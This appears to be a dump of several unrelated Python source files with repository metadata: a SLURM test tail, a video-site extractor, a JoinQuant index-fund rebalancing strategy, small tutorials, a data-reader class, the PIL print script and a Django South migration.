        assert "--mpi" in cmd
        assert cmd1 in cmd
    finally:
        # Restore SLURM_JOB_ID exactly as it was before this call.
        if job_id:
            if initial is None:
                del os.environ["SLURM_JOB_ID"]
            else:
                os.environ["SLURM_JOB_ID"] = initial
        elif initial is not None:
            os.environ["SLURM_JOB_ID"] = initial
def test_works():
    # With SLURM_JOB_ID present the NERSC command builds successfully.
    _test_nersc(True)
def test_warning():
    # Without SLURM_JOB_ID the NERSC site refuses to build the command.
    with pytest.raises(ValueError):
        _test_nersc(False)
| [
"joezuntz@googlemail.com"
] | joezuntz@googlemail.com |
e545de69bc868a2bb6cdfebd2ab53a87e2dbcdc5 | 8d35b8aa63f3cae4e885e3c081f41235d2a8f61f | /discord/ext/dl/extractor/performgroup.py | 553b2b6e861bedeaababf7888ba0a15b779f4d71 | [
"MIT"
] | permissive | alexyy802/Texus | 1255f4e54c8d3cc067f0d30daff1cf24932ea0c9 | c282a836f43dfd588d89d5c13f432896aebb540f | refs/heads/master | 2023-09-05T06:14:36.217601 | 2021-11-21T03:39:55 | 2021-11-21T03:39:55 | 429,390,575 | 0 | 0 | MIT | 2021-11-19T09:22:22 | 2021-11-18T10:43:11 | Python | UTF-8 | Python | false | false | 3,674 | py | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import int_or_none
class PerformGroupIE(InfoExtractor):
_VALID_URL = r"https?://player\.performgroup\.com/eplayer(?:/eplayer\.html|\.js)#/?(?P<id>[0-9a-f]{26})\.(?P<auth_token>[0-9a-z]{26})"
_TESTS = [
{
# http://www.faz.net/aktuell/sport/fussball/wm-2018-playoffs-schweiz-besiegt-nordirland-1-0-15286104.html
"url": "http://player.performgroup.com/eplayer/eplayer.html#d478c41c5d192f56b9aa859de8.1w4crrej5w14e1ed4s1ce4ykab",
"md5": "259cb03d142e2e52471e8837ecacb29f",
"info_dict": {
"id": "xgrwobuzumes1lwjxtcdpwgxd",
"ext": "mp4",
"title": "Liga MX: Keine Einsicht nach Horrorfoul",
"description": "md5:7cd3b459c82725b021e046ab10bf1c5b",
"timestamp": 1511533477,
"upload_date": "20171124",
},
}
]
def _call_api(self, service, auth_token, content_id, referer_url):
return self._download_json(
"http://ep3.performfeeds.com/ep%s/%s/%s/"
% (service, auth_token, content_id),
content_id,
headers={
"Referer": referer_url,
"Origin": "http://player.performgroup.com",
},
query={
"_fmt": "json",
},
)
def _real_extract(self, url):
player_id, auth_token = re.search(self._VALID_URL, url).groups()
bootstrap = self._call_api("bootstrap", auth_token, player_id, url)
video = bootstrap["config"]["dataSource"]["sourceItems"][0]["videos"][0]
video_id = video["uuid"]
vod = self._call_api("vod", auth_token, video_id, url)
media = vod["videos"]["video"][0]["media"]
formats = []
hls_url = media.get("hls", {}).get("url")
if hls_url:
formats.extend(
self._extract_m3u8_formats(
hls_url, video_id, "mp4", "m3u8_native", m3u8_id="hls", fatal=False
)
)
hds_url = media.get("hds", {}).get("url")
if hds_url:
formats.extend(
self._extract_f4m_formats(
hds_url + "?hdcore", video_id, f4m_id="hds", fatal=False
)
)
for c in media.get("content", []):
c_url = c.get("url")
if not c_url:
continue
tbr = int_or_none(c.get("bitrate"), 1000)
format_id = "http"
if tbr:
format_id += "-%d" % tbr
formats.append(
{
"format_id": format_id,
"url": c_url,
"tbr": tbr,
"width": int_or_none(c.get("width")),
"height": int_or_none(c.get("height")),
"filesize": int_or_none(c.get("fileSize")),
"vcodec": c.get("type"),
"fps": int_or_none(c.get("videoFrameRate")),
"vbr": int_or_none(c.get("videoRate"), 1000),
"abr": int_or_none(c.get("audioRate"), 1000),
}
)
self._sort_formats(formats)
return {
"id": video_id,
"title": video["title"],
"description": video.get("description"),
"thumbnail": video.get("poster"),
"duration": int_or_none(video.get("duration")),
"timestamp": int_or_none(video.get("publishedTime"), 1000),
"formats": formats,
}
| [
"noreply@github.com"
] | alexyy802.noreply@github.com |
549c3d80595c7be7ec9706b113796272180aa681 | b242c102f50ded2fee0cc6ac6aea442a1b6792cb | /strategy/65_8只基金按PE调仓.py | f5e4523c7a6542df7ee6f4aba6ead2c1ffa43860 | [] | no_license | VIRGIL-YAN/woquant | 2c0811ed743d217b2ec478988ce0808838f1177a | ac5437e0eed552aa9b3015d1ace647c9a492f97d | refs/heads/master | 2023-04-16T17:23:05.754846 | 2021-04-30T08:58:10 | 2021-04-30T08:58:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,036 | py | 该策略由聚宽用户分享,仅供学习交流使用。
原文网址:https://www.joinquant.com/post/11700
原文一般包含策略说明,如有疑问建议到原文和作者交流讨论。
原文策略源码如下:
# 标题:低回撤,PE分仓
# 作者:桑梓
#自定义数据是股指ETF占的仓位
from __future__ import division
import numpy as np
import pandas as pd
import bisect
def initialize(context):
    """JoinQuant entry point: schedule the monthly rebalance flag, set the
    benchmark, define the hold-level ladder and create the eight
    independent sub-portfolios (one per tracked index fund)."""
    g.flag = False
    run_monthly(monthly, 1, time='open')
    set_benchmark('000300.XSHG')
    #g.CN10y_bond=0.03
    log.set_level('order', 'error')
    # Target exposure ladder used by Relation(): richer valuations map to
    # lower holding levels (HoldLevel1 = out of the market, ... = fully in).
    g.HoldLevel=0
    g.LastHoldLevel=0
    g.HoldLevel1=0
    g.HoldLevel2=0.2
    g.HoldLevel3=0.4
    g.HoldLevel4=0.6
    g.HoldLevel5=0.75
    g.HoldLevel6=0.9
    # Create 8 independent sub-portfolios.
    init_cash = context.portfolio.starting_cash # get the starting capital
    init_cash = context.portfolio.starting_cash/8 # split the starting capital into 8 equal parts
    set_subportfolios([SubPortfolioConfig(cash=init_cash, type='stock'),\
                       SubPortfolioConfig(cash=init_cash, type='stock'),\
                       SubPortfolioConfig(cash=init_cash, type='stock'),\
                       SubPortfolioConfig(cash=init_cash, type='stock'),\
                       SubPortfolioConfig(cash=init_cash, type='stock'),\
                       SubPortfolioConfig(cash=init_cash, type='stock'),\
                       SubPortfolioConfig(cash=init_cash, type='stock'),\
                       SubPortfolioConfig(cash=init_cash, type='stock')])
    # Each entry: [index code, traded fund, subportfolio, pindex,
    # MinRatio (PE floor), MaxRatio1 (PE ceiling)] -- the last two are
    # consumed by handle_data/Relation as the historical PE span.
    g.stocks = {
        'hs300':['000300.XSHG','510300.XSHG',context.subportfolios[0],0,14.10,44.42],
        'zzhb':['000827.XSHG','512580.XSHG',context.subportfolios[1],1,26.78,72.29], # CSI environmental-protection index
        'zz500':['000905.XSHG','510510.XSHG',context.subportfolios[2],2,21.99,69.81], # CSI 500
        'hlzz':['000015.XSHG','510880.XSHG',context.subportfolios[3],3,8.40,46.23], # dividend index
        'cyb':['399006.XSHE','159915.XSHE',context.subportfolios[4],4,27.61,121.85], # ChiNext
        'zztmt':['000998.XSHG','150203.XSHE',context.subportfolios[5],5,28.15,108.92], # TMT
        'yy':['000933.XSHG','512010.XSHG',context.subportfolios[6],6,22.22,66.82], # pharmaceuticals
        'zz100':['000903.XSHG','150012.XSHE',context.subportfolios[7],7,9.81,36.59] # CSI 100
    }
def monthly(context):
    # Runs at each month's first open: arm the flag so that handle_data
    # performs the PE-based rebalance on the next bar.
    g.flag = True
def Relation(n, MaxRatio, MinRatio):
    """Map a PE reading ``n`` onto a target holding level.

    Thresholds are fractions of the PE span (``MaxRatio``) above the PE
    floor (``MinRatio``): the richer the valuation, the lower the level.
    """
    # The top bucket is inclusive (>=); all remaining buckets are strict (>).
    if n >= MaxRatio * 0.9 + MinRatio:
        return g.HoldLevel1
    buckets = (
        (0.8, g.HoldLevel2),
        (0.7, g.HoldLevel3),
        (0.6, g.HoldLevel4),
        (0.5, g.HoldLevel5),
        (0.3, g.HoldLevel6),
    )
    for fraction, level in buckets:
        if n > MaxRatio * fraction + MinRatio:
            return level
    # Valuation is cheap enough to be fully invested.
    return 1
#else:
# k=(g.MinHoldLevel-g.MaxHoldLevel)/(g.MaxRatio-g.MinRatio)
# b=g.MinHoldLevel-g.MinRatio*k
# g.HoldLevel=k*n+b
#Debug:
#print 'k=(' +str(g.MaxHoldLevel)+'-'+str(g.MinHoldLevel) + ')/' +\
#'('+str(g.MaxRatio)+'-'+str(g.MinRatio)+')'+' = '+str(k)
#print 'HoldLevel=' +str(k) + '*N' + '+' +str(b)
def PeRatio(code,context): # compute the index's current PE
    """Harmonic-mean PE of the index's constituents as of the current bar.

    Stocks with non-positive PE contribute zero weight to the denominator;
    returns NaN when no fundamentals are available.
    """
    date = context.current_dt
    stocks = get_index_stocks(code, date)
    q = query(valuation).filter(valuation.code.in_(stocks))
    df = get_fundamentals(q, date)
    if len(df)>0:
        # Harmonic mean: count / sum of earnings yields (1/PE).
        pe2 = len(df)/sum([1/p if p>0 else 0 for p in df.pe_ratio])
        return pe2
    else:
        return float('NaN')
#def ChangeHoldLevel(stock,NewHoldLevel,context):
# order_target_value(g.stocks[stock][1],NewHoldLevel*g.stocks[stock][2],pindex=g.stocks[stock][3])
#order_target_value(g.Test_bond,(1-NewHoldLevel)*AllMoney,None)
def handle_data(context, data):
    """Once per month (when ``g.flag`` is armed) recompute each index's PE
    and rebalance its sub-portfolio to the target exposure from Relation()."""
    #if context.current_dt.isoweekday()!=1: #ne Marcher que Lundi.
    # return
    #N= (1/PeRatio(get_current_data()))/g.CN10y_bond
    if g.flag == True:
        for stock in g.stocks:
            index_pe = PeRatio(g.stocks[stock][0],context)
            # PE span: [4] is the historical floor, [5] the ceiling.
            MaxRatio1 = g.stocks[stock][5]
            MinRatio = g.stocks[stock][4]
            MaxRatio = MaxRatio1-MinRatio
            HoldLevel = Relation(index_pe,MaxRatio,MinRatio)
            trade_code = g.stocks[stock][1]
            # Target market value = sub-portfolio value * hold level.
            cash = g.stocks[stock][2].total_value * HoldLevel
            inde = g.stocks[stock][3]
            order_target_value(trade_code,cash,pindex=inde)
        # Disarm until the next monthly trigger.
        g.flag = False
    '''
    N = PeRatio(code,context)
    HoldLevel = Relation(N)
    ChangeHoldLevel(HoldLevel,context.portfolio.total_value)
    print 'PE:%.2f'%N
    print "Holdlevel is %.2f" % HoldLevel
    record(name=g.HoldLevel)
    '''
"28278672@qq.com"
] | 28278672@qq.com |
5a178504701103cd6061e28c6f5cff59ceab7594 | 1625edfe28b4b0979fd32b4a3c5e55249a993fd5 | /baekjoon6378.py | 8ce2953ef95739ba3df687df8eebc76b9b14c075 | [] | no_license | beOk91/baekjoon2 | b8bf504c506c6278899d4107ecfe51974ef13f5e | 39569f8effb8e32405a7d74d98bdabcab783ec56 | refs/heads/master | 2023-05-11T20:11:19.015113 | 2020-09-14T23:58:49 | 2020-09-14T23:58:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 166 | py | while True:
a=input()
if a=="0":break
while True:
result=sum(int(i) for i in a)
a=str(result)
if int(a)<10:break
print(result) | [
"be_ok91@naver.com"
] | be_ok91@naver.com |
f2d1cdcbd86af861339970878e3c4bcecd5bf9df | c3132612a7ac311e501e432e1a4c7592bbd7a713 | /day09/code/07_迭代器&迭代器对象.py | 0f2533805b097e5b79005e0871676ac0381c71a2 | [] | no_license | everqiujuan/python | 7b8e169107012c3d7829d4ebd9860482fc0d8fec | b0a98de943217e24da60f79dec4fe8ebf4f1c713 | refs/heads/master | 2020-06-21T16:57:22.260311 | 2019-07-18T05:58:44 | 2019-07-18T05:58:44 | 184,990,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,326 | py |
# collections.abc is the canonical home of these ABCs; importing them
# directly from ``collections`` was deprecated and removed in Python 3.10.
from collections.abc import Iterator  # iterator: iterable that also supports next()
from collections.abc import Iterable  # iterable: anything a for-in loop can traverse
# Iterables vs. iterators:
#  * an *iterable* is anything a for-in loop can traverse;
#  * an *iterator* additionally supports next().
# Built-in containers and strings are iterable but NOT iterators;
# generator objects are both.
for sample in ([1, 2], (1, 2), {}, {1, 2}, "hello", (i for i in range(1, 3))):
    print(isinstance(sample, Iterable))  # True for every sample

for sample in ([1, 2], (1, 2), {}, {1, 2}, "hello", (i for i in range(1, 3))):
    print(isinstance(sample, Iterator))  # True only for the generator

# iter() turns any iterable into an iterator; next() then walks it.
list1 = [11, 22, 33]
res = iter(list1)
# next(res) would yield 11, then 22, then 33, then raise StopIteration.

# list() drains the iterator back into a list.
list2 = list(res)
print(list2)  # [11, 22, 33]
| [
"1748636236@qq.com"
] | 1748636236@qq.com |
472b14b7674ba6998f913e051207c965ee2f4138 | 599bca7f41694112b1367854a81e0bd9162a6f7a | /2020SpringClass/学习笔记/201702064-zhousijia/6zhousijia201702064/code/MiniFramework/DataReader_2_0.py | 70736905f84cb84aac6cdcd6e66768d5c17f3b53 | [
"MIT"
] | permissive | XIAxuanzheFrancis/AIML | f625013a5010799681601cf25b7c4b103226dcc4 | 7e333fd65378c2cbaeedbeaa3560f30e8a341857 | refs/heads/master | 2023-01-19T17:29:45.156651 | 2020-11-29T15:35:52 | 2020-11-29T15:35:52 | 299,838,961 | 2 | 0 | MIT | 2020-09-30T07:16:30 | 2020-09-30T07:16:29 | null | UTF-8 | Python | false | false | 7,754 | py | # Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for full license information.
"""
Version 2.0
"""
import numpy as np
from pathlib import Path
from MiniFramework.EnumDef_3_0 import *
"""
X:
x1: feature1 feature2 feature3...
x2: feature1 feature2 feature3...
x3: feature1 feature2 feature3...
......
Y: [if regression, value]
[if binary classification, 0/1]
[if multiple classification, e.g. 4 category, one-hot]
"""
class DataReader_2_0(object):
    """Reads train/test ``.npz`` archives and provides normalization,
    label encoding, validation splitting, shuffling and mini-batching.

    Feature matrices are laid out (num_examples, num_features); raw labels
    are (num_examples, 1) before encoding.
    """

    def __init__(self, train_file, test_file):
        self.train_file_name = train_file
        self.test_file_name = test_file
        self.num_train = 0        # num of training examples
        self.num_test = 0         # num of test examples
        self.num_validation = 0   # num of validation examples
        self.num_feature = 0      # num of features
        self.num_category = 0     # num of categories
        self.XTrain = None        # training feature set
        self.YTrain = None        # training label set
        self.XTest = None         # test feature set
        self.YTest = None         # test label set
        self.XTrainRaw = None     # training feature set before normalization
        self.YTrainRaw = None     # training label set before normalization
        self.XTestRaw = None      # test feature set before normalization
        self.YTestRaw = None      # test label set before normalization
        self.XDev = None          # validation feature set
        self.YDev = None          # validation label set

    def ReadData(self):
        """Load both archives ("data"/"label" arrays); raise if missing."""
        train_file = Path(self.train_file_name)
        if train_file.exists():
            data = np.load(self.train_file_name)
            self.XTrainRaw = data["data"]
            self.YTrainRaw = data["label"]
            assert(self.XTrainRaw.shape[0] == self.YTrainRaw.shape[0])
            self.num_train = self.XTrainRaw.shape[0]
            self.num_feature = self.XTrainRaw.shape[1]
            self.num_category = len(np.unique(self.YTrainRaw))
            # Defaults in case the caller never normalizes.
            self.XTrain = self.XTrainRaw
            self.YTrain = self.YTrainRaw
        else:
            raise Exception("Cannot find train file!!!")

        test_file = Path(self.test_file_name)
        if test_file.exists():
            data = np.load(self.test_file_name)
            self.XTestRaw = data["data"]
            self.YTestRaw = data["label"]
            assert(self.XTestRaw.shape[0] == self.YTestRaw.shape[0])
            self.num_test = self.XTestRaw.shape[0]
            # Defaults in case the caller never normalizes.
            self.XTest = self.XTestRaw
            self.YTest = self.YTestRaw
            # In case no validation set is ever created.
            self.XDev = self.XTest
            self.YDev = self.YTest
        else:
            raise Exception("Cannot find test file!!!")

    def NormalizeX(self):
        """Min-max normalize features: train and test are merged first so
        both share the same per-feature min/range, then split again."""
        x_merge = np.vstack((self.XTrainRaw, self.XTestRaw))
        x_merge_norm = self.__NormalizeX(x_merge)
        train_count = self.XTrainRaw.shape[0]
        self.XTrain = x_merge_norm[0:train_count, :]
        self.XTest = x_merge_norm[train_count:, :]

    def __NormalizeX(self, raw_data):
        """Column-wise min-max scaling; min/range are kept in self.X_norm
        so that prediction-time data can be scaled identically."""
        temp_X = np.zeros_like(raw_data)
        self.X_norm = np.zeros((2, self.num_feature))
        # Normalize each feature over all examples.
        for i in range(self.num_feature):
            x = raw_data[:, i]
            max_value = np.max(x)
            min_value = np.min(x)
            self.X_norm[0, i] = min_value               # min value
            self.X_norm[1, i] = max_value - min_value   # range value
            temp_X[:, i] = (x - self.X_norm[0, i]) / self.X_norm[1, i]
        return temp_X

    def NormalizeY(self, nettype, base=0):
        """Encode labels according to the network type: Fitting -> min-max,
        BinaryClassifier -> 0/1, MultipleClassifier -> one-hot.
        ``base`` is the smallest raw label value."""
        if nettype == NetType.Fitting:
            y_merge = np.vstack((self.YTrainRaw, self.YTestRaw))
            y_merge_norm = self.__NormalizeY(y_merge)
            train_count = self.YTrainRaw.shape[0]
            self.YTrain = y_merge_norm[0:train_count, :]
            self.YTest = y_merge_norm[train_count:, :]
        elif nettype == NetType.BinaryClassifier:
            # NOTE(review): ``base`` is forwarded as positive_label here --
            # confirm that is the intended meaning for binary data.
            self.YTrain = self.__ToZeroOne(self.YTrainRaw, base)
            self.YTest = self.__ToZeroOne(self.YTestRaw, base)
        elif nettype == NetType.MultipleClassifier:
            self.YTrain = self.__ToOneHot(self.YTrainRaw, base)
            self.YTest = self.__ToOneHot(self.YTestRaw, base)

    def __NormalizeY(self, raw_data):
        """Min-max scaling for a single-column regression target; stores
        min/range in self.Y_norm for DeNormalizeY."""
        assert(raw_data.shape[1] == 1)
        self.Y_norm = np.zeros((2, 1))
        max_value = np.max(raw_data)
        min_value = np.min(raw_data)
        self.Y_norm[0, 0] = min_value               # min value
        self.Y_norm[1, 0] = max_value - min_value   # range value
        y_new = (raw_data - min_value) / self.Y_norm[1, 0]
        return y_new

    def DeNormalizeY(self, predict_data):
        """Map normalized predictions back to the original value range."""
        real_value = predict_data * self.Y_norm[1, 0] + self.Y_norm[0, 0]
        return real_value

    def __ToOneHot(self, Y, base=0):
        """One-hot encode integer labels; column index is ``label - base``."""
        count = Y.shape[0]
        temp_Y = np.zeros((count, self.num_category))
        for i in range(count):
            n = (int)(Y[i, 0])
            temp_Y[i, n - base] = 1
        return temp_Y

    def __ToZeroOne(self, Y, positive_label=1, negative_label=0, positiva_value=1, negative_value=0):
        """Map binary labels onto target values (for a tanh output layer
        pass negative_value=-1).

        Bug fix: the original definition was missing ``self`` (so the
        instance was bound as ``Y``) and iterated ``range()`` with no
        argument, which raises TypeError on any call.
        """
        temp_Y = np.zeros_like(Y)
        for i in range(Y.shape[0]):
            if Y[i, 0] == negative_label:    # negative class -> negative_value
                temp_Y[i, 0] = negative_value
            elif Y[i, 0] == positive_label:  # positive class -> positiva_value
                temp_Y[i, 0] = positiva_value
        return temp_Y

    def NormalizePredicateData(self, X_predicate):
        """Normalize prediction-time data with the stored min/range.
        Note: features run along axis 0 here (transposed layout)."""
        X_new = np.zeros(X_predicate.shape)
        n_feature = X_predicate.shape[0]
        for i in range(n_feature):
            x = X_predicate[i, :]
            X_new[i, :] = (x - self.X_norm[0, i]) / self.X_norm[1, i]
        return X_new

    def GenerateValidationSet(self, k=10):
        """Explicitly split off the first 1/k of the training set as the
        validation set (call after any shuffling/normalization)."""
        self.num_validation = (int)(self.num_train / k)
        self.num_train = self.num_train - self.num_validation
        # validation set
        self.XDev = self.XTrain[0:self.num_validation]
        self.YDev = self.YTrain[0:self.num_validation]
        # remaining train set
        self.XTrain = self.XTrain[self.num_validation:]
        self.YTrain = self.YTrain[self.num_validation:]

    def GetValidationSet(self):
        return self.XDev, self.YDev

    def GetTestSet(self):
        return self.XTest, self.YTest

    def GetBatchTrainSamples(self, batch_size, iteration):
        """Return the ``iteration``-th mini-batch of the training set."""
        start = iteration * batch_size
        end = start + batch_size
        return self.XTrain[start:end, :], self.YTrain[start:end, :]

    def Shuffle(self):
        """Shuffle X and Y with the same seed so rows stay aligned
        (np.random.permutation only permutes along the first axis)."""
        seed = np.random.randint(0, 100)
        np.random.seed(seed)
        XP = np.random.permutation(self.XTrain)
        np.random.seed(seed)
        YP = np.random.permutation(self.YTrain)
        self.XTrain = XP
        self.YTrain = YP
| [
"gjy2poincare@users.noreply.github.com"
] | gjy2poincare@users.noreply.github.com |
2320023c2eb59c4ab96169508000ac9e65da1888 | fcfe929bc654e86a36ca4def29811ce09a86b0f2 | /bin/pilprint.py | de41bae68c007367dda9bc66b59cdbdac14d3d85 | [] | no_license | frclasso/trydjango19 | b3e12500acf116e2c705a3624bbcd6eaa08ca593 | e6f871121c2ec38bc3798752d96400a03287e071 | refs/heads/master | 2020-12-30T22:56:59.320974 | 2017-02-01T16:21:53 | 2017-02-01T16:21:53 | 80,637,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,660 | py | #!/Users/fabio/Estudo/Prog/Django/coding-for-entrepreneurs/trydjango19/bin/python
#
# The Python Imaging Library.
# $Id$
#
# print image files to postscript printer
#
# History:
# 0.1 1996-04-20 fl Created
# 0.2 1996-10-04 fl Use draft mode when converting.
# 0.3 2003-05-06 fl Fixed a typo or two.
#
from __future__ import print_function
import getopt
import os
import sys
import subprocess
VERSION = "pilprint 0.3/2003-05-05"
from PIL import Image
from PIL import PSDraw
letter = (1.0*72, 1.0*72, 7.5*72, 10.0*72)
def description(filepath, image):
    """Build a one-line caption for *filepath*: the base name without its
    extension, followed by the image format (if known), size and mode."""
    base_name = os.path.split(filepath)[1]
    title = os.path.splitext(base_name)[0]
    if image.format:
        details = " (" + image.format + " %dx%d "
    else:
        details = " (%dx%d "
    return title + details % image.size + image.mode + ")"
# No files given: print usage and exit with an error status.
if len(sys.argv) == 1:
    print("PIL Print 0.3/2003-05-05 -- print image files")
    print("Usage: pilprint files...")
    print("Options:")
    print(" -c colour printer (default is monochrome)")
    print(" -d debug (show available drivers)")
    print(" -p print via lpr (default is stdout)")
    print(" -P <printer> same as -p but use given printer")
    sys.exit(1)
# Parse command-line options; abort on malformed flags.
try:
    opt, argv = getopt.getopt(sys.argv[1:], "cdpP:")
except getopt.error as v:
    print(v)
    sys.exit(1)
printerArgs = [] # print to stdout
monochrome = 1 # reduce file size for most common case
for o, a in opt:
    if o == "-d":
        # debug: show available drivers
        Image.init()
        print(Image.ID)
        sys.exit(1)
    elif o == "-c":
        # colour printer
        monochrome = 0
    elif o == "-p":
        # default printer channel
        printerArgs = ["lpr"]
    elif o == "-P":
        # printer channel (named printer)
        printerArgs = ["lpr", "-P%s" % a]
# Render each image as a one-page PostScript document, either piped to
# lpr or written to stdout.
for filepath in argv:
    try:
        im = Image.open(filepath)
        title = description(filepath, im)
        # Monochrome mode: convert to greyscale unless already 1-bit/grey.
        if monochrome and im.mode not in ["1", "L"]:
            im.draft("L", im.size)
            im = im.convert("L")
        if printerArgs:
            p = subprocess.Popen(printerArgs, stdin=subprocess.PIPE)
            fp = p.stdin
        else:
            fp = sys.stdout
        ps = PSDraw.PSDraw(fp)
        ps.begin_document()
        # Title above the image, version string below it.
        ps.setfont("Helvetica-Narrow-Bold", 18)
        ps.text((letter[0], letter[3]+24), title)
        ps.setfont("Helvetica-Narrow-Bold", 8)
        ps.text((letter[0], letter[1]-30), VERSION)
        ps.image(letter, im)
        ps.end_document()
        if printerArgs:
            fp.close()
    # NOTE(review): bare except swallows everything, including
    # KeyboardInterrupt -- consider narrowing to Exception.
    except:
        print("cannot print image", end=' ')
        print("(%s:%s)" % (sys.exc_info()[0], sys.exc_info()[1]))
| [
"frcalsso@yahoo.com.br"
] | frcalsso@yahoo.com.br |
b98b5fab53f246bfb7259d79aeeba263873e17d1 | 18d223e5ea590e60bc791987034276eed2651721 | /sk1-tt/lesson2-data-processing/c5-put-it-all-together/c50_pipeline_sample.py | 539f7210c85f09ecf85bf1e3d45298cb7f22b35d | [] | no_license | sonicfigo/tt-sklearn | 83b419b4f8984fc63ef41bf2af5b682477350992 | 8e473e958b0afc6154ba3c4dee818fd4da8f504b | refs/heads/master | 2020-03-26T16:07:59.758723 | 2018-09-25T06:28:47 | 2018-09-25T06:28:47 | 145,084,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,879 | py | # coding=utf-8
"""
非官网,网络帖子里的书写例子
除了最后一个学习器之外,前面的所有学习器必须提供transform方法,
该方法用于数据转化,如:
- 归一化
- 正则化
- 特征提取
若没有,就异常
"""
from sklearn.datasets import load_digits
from sklearn import cross_validation
from sklearn.model_selection import train_test_split
from sklearn.svm import LinearSVC
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.decomposition import PCA
m2 = LogisticRegression(C=1)
def test_Pipeline_ex(data):
    """Deliberately broken pipeline: LinearSVC is placed before the final
    step but provides no ``transform`` method, so fitting raises."""
    x_train, x_test, y_train, y_test = data
    svm = LinearSVC(C=1, penalty='l1', dual=False)
    steps = [('Linear_SVM', svm), ('LogisticRegression', m2)]
    pipeline = Pipeline(steps=steps)
    pipeline.fit(x_train, y_train)
    print('name steps:', pipeline.named_steps)
    print('Pipeline Score:', pipeline.score(x_test, y_test))
"""
工作流程:先进行pca降为,然后使用Logistic回归,来分类
"""
def test_Pipeline_ok(data):
    """Working pipeline: PCA (which implements ``transform``) reduces the
    features before the final logistic-regression classifier."""
    x_train, x_test, y_train, y_test = data
    steps = [('PCA', PCA()), ('LogisticRegression', m2)]
    pipeline = Pipeline(steps=steps)
    pipeline.fit(x_train, y_train)
    print('name steps:', pipeline.named_steps)
    print('Pipeline Score:', pipeline.score(x_test, y_test))
if __name__ == '__main__':
    data = load_digits()
    X = data.data
    y = data.target
    try:
        # Expected to fail: LinearSVC has no transform() (see docstring).
        test_Pipeline_ex(train_test_split(X, y, test_size=0.25,
                                          random_state=0, stratify=y))
    except BaseException as ex:
        print('\n===================error:')
        print(ex)
    print('\n===================ok:')
    # PCA -> LogisticRegression runs to completion and prints its score.
    test_Pipeline_ok(train_test_split(X, y, test_size=0.25,
                                      random_state=0, stratify=y))
| [
"sonic821113@gmail.com"
] | sonic821113@gmail.com |
c616d088f24594e7ea52799570d97027ccf70e4c | f4d4111c7e51bb2c66ea73198b3f99458ba5822f | /Aula 7/ex012.py | 940e268c61dac38b6eff058984d2498b18da2f33 | [] | no_license | LukeBreezy/Python3_Curso_Em_Video | 871b98b4e56db356fc24f2e953ad33e8928ba118 | 34ad1b5037f916964bde99b500a28aed86f18e39 | refs/heads/main | 2023-03-03T03:33:44.805522 | 2021-02-11T19:52:13 | 2021-02-11T19:52:13 | 338,129,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | prod = float(input('Qual o valor do produto? R$ '))
promo = prod * 0.95  # apply the 5% promotional discount
# Bug fix: the original replaced only the FIRST '.' in the whole sentence,
# so the discounted price kept the English decimal point. Format each price
# separately so BOTH use the Brazilian decimal comma and the sentence's
# final period is preserved.
print('O produto com o valor de R$ {}, na promoção com 5% de desconto fica R$ {}.'.format(
    '{:.2f}'.format(prod).replace('.', ','),
    '{:.2f}'.format(promo).replace('.', ',')))
"lkslukas23@gmail.com"
] | lkslukas23@gmail.com |
1570ad62bbaf6ae4817b1160b2254c7b7ca68faa | 43c863fbab46daa09acc4bb178292145a6776929 | /pathfinder/terminal/phybeast/utils/prepare_metadata/commands.py | fe7033acb2c3b3cac2743fc5e694f34661d93649 | [
"MIT"
] | permissive | pf-core/pf-core | be034a420e084e416791c98b659b757c3d7e88c3 | 0caf8abde968b959be2284518f7dc951ba680202 | refs/heads/master | 2020-07-29T04:53:25.306031 | 2019-09-24T05:44:54 | 2019-09-24T05:44:54 | 209,677,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | import click
from pathlib import Path
from pathfinder.utils import phybeast_prepare_metadata_file
@click.command()
@click.option(
    "--meta_data", "-m", default="input_alignment.fasta", type=Path,
    help="Input meta data file, tab-delimited, includes: name, date columns.",
)
@click.option(
    "--prep", "-p", default="lsd2", help="Prepare metadata file for one of: lsd2, treetime.", type=str,
)
@click.option(
    "--output", "-o", default="lsd2.meta", help="Output path of prepared meta data file.", type=Path,
)
def prepare_metadata(meta_data, prep, output):
    """ Randomise the dates in a meta data file with columns: name, date """
    # Delegates the work; ``prep`` selects the output format expected by the
    # downstream dating tool (LSD2 or TreeTime).
    # NOTE(review): the docstring (used by click as help text) mentions
    # randomising dates, but the helper called here *prepares* the metadata
    # file -- confirm the intended wording before changing user-facing help.
    phybeast_prepare_metadata_file(meta_file=meta_data, prep=prep, output_file=output)
| [
"eikejoachim.steinig@my.jcu.edu.au"
] | eikejoachim.steinig@my.jcu.edu.au |
0a0d1ba92277fb656ae7de2143df0380583d70dc | ca0c3c1cdfdd714c7780c27fcecd4a2ae39d1474 | /src/fmf/apps/news/migrations/0010_auto__add_field_news_category.py | daa06d37ddb7c686a069b09ab5a6ea086d5e4122 | [] | no_license | vasyabigi/fmf | fce88a45fb47f3f7652995af40b567ffdf27a4a0 | 988ba668f3ce6da2670b987a1eeae3c87761eac5 | refs/heads/master | 2021-01-23T07:29:52.185306 | 2012-08-27T13:11:51 | 2012-08-27T13:11:51 | 2,803,493 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,032 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply the migration: add the nullable 'category' CharField to News."""
        # Adding field 'News.category'
        db.add_column('news_news', 'category',
                      self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
                      keep_default=False)
    def backwards(self, orm):
        """Reverse the migration: drop the 'category' column again."""
        # Deleting field 'News.category'
        db.delete_column('news_news', 'category')
models = {
'news.event': {
'Meta': {'ordering': "('-date_to',)", 'object_name': 'Event'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_from': ('django.db.models.fields.DateField', [], {}),
'date_to': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
